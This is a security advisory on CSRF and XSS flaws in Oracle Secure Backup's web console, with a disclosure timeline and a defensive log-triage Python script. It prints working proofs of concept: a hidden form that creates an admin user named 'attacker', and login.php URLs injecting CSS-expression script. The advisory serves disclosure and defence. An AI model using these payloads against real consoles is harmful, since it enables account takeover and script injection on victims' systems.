Saturday, April 28, 2012

Oracle Secure Backup Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) Vulnerabilities

Oracle Secure Backup is a general-purpose network data protection tool that simplifies and automates the backup and restore of files on a file system. The software can also serve as a media management layer for Recovery Manager through the SBT interface.

Sow Ching Shiong, an independent vulnerability researcher, has discovered multiple vulnerabilities in Oracle Secure Backup. These issues were discovered in a default installation of Oracle Secure Backup. Other earlier versions may also be affected.

Proof of concept
Cross-Site Request Forgery (CSRF)

<form action="https://[target]/index.php" id="csrf" method="post">
<input type="hidden" name="process" value="1" />
<input type="hidden" name="tab" value="2" />
<input type="hidden" name="mode" value="2" />
<input type="hidden" name="button" value="Ok" />
<input type="hidden" name="screen" value="d" />
<input type="hidden" name="selector%5B%5D" value="" />
<input type="hidden" name="changeobject" value="attacker" />
<input type="hidden" name="upassword" value="passwd123" />
<input type="hidden" name="vpassword" value="passwd123" />
<input type="hidden" name="oclass" value="admin" />
<input type="hidden" name="uclass" value="" />
<input type="hidden" name="givenname" value="" />
<input type="hidden" name="unixname" value="" />
<input type="hidden" name="unixgroup" value="" />
<input type="hidden" name="ndmpserveruser" value="no" />
<input type="hidden" name="emailaddress" value="" />
<input type="hidden" name="op" value="Add" />
</form>

Cross-Site Scripting (XSS)

  • https://[target]/login.php?clear=yes&tab='%20stYle='x:expre/**/ssion(alert(1))%20&mode=3
  • https://[target]/login.php?clear=yes&tab=3&mode='%20stYle='x:expre/**/ssion(alert(1))

Oracle has released patches which address these issues. Please see the references for more information.
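
For administrators reviewing web server logs from an unpatched console, the following Python sketch flags both request shapes shown in the proof of concept: non-numeric `tab`/`mode` values on login.php and POSTs to index.php whose Referer names another site. It is an added example, not part of the original advisory or of Oracle's code; the record layout, the host name `osb.example.internal`, the function names, and the assumption that legitimate `tab` and `mode` values are short integers are all assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the admin console is served from this host (constructed name).
CONSOLE_HOST = "osb.example.internal"

# Constructed sample records: (method, request URI, Referer header).
SAMPLE_REQUESTS = [
    ("GET", "/login.php?clear=yes&tab=3&mode=3", "-"),
    ("GET", "/login.php?clear=yes&tab='%20stYle='x:expre/**/ssion(alert(1))%20&mode=3", "-"),
    ("POST", "/index.php", "https://osb.example.internal/index.php"),
    ("POST", "/index.php", "https://unrelated.example/page.html"),
]

# Assumption: legitimate tab/mode values are short integers, as in "tab=3&mode=3".
NUMERIC = re.compile(r"\A[0-9]{1,4}\Z")


def non_numeric_params(uri, names=("tab", "mode")):
    """Return the tab/mode parameter names whose decoded value is not a short integer."""
    query = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    return [n for n in names for v in query.get(n, []) if not NUMERIC.match(v)]


def is_cross_site(referer, host=CONSOLE_HOST):
    """True when a Referer is present and names a different host than the console."""
    if referer in ("", "-"):
        return False  # absent Referer: cannot decide from this field alone
    return urlsplit(referer).hostname != host


def triage(requests):
    """Return (index, reason) for each record matching one of the two PoC shapes."""
    findings = []
    for i, (method, uri, referer) in enumerate(requests):
        path = urlsplit(uri).path
        if path == "/login.php":
            bad = non_numeric_params(uri)
            if bad:
                findings.append((i, "non-numeric " + ",".join(bad)))
        elif path == "/index.php" and method == "POST" and is_cross_site(referer):
            findings.append((i, "cross-site POST"))
    return findings


if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_REQUESTS):
        print(idx, reason)
```

A hit on the cross-site POST check is worth correlating with any newly created users in the admin class, since that is what the CSRF form above requests.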


Vendor URL:

Disclosure Timeline
2011-01-21 - Vulnerabilities discovered.
2011-01-21 - Vulnerabilities reported to Secunia.
2011-01-21 - Secunia confirmed the vulnerabilities and contacted the vendor.
2011-07-19 - Patch released.
2011-07-20 - Advisory published by Secunia.
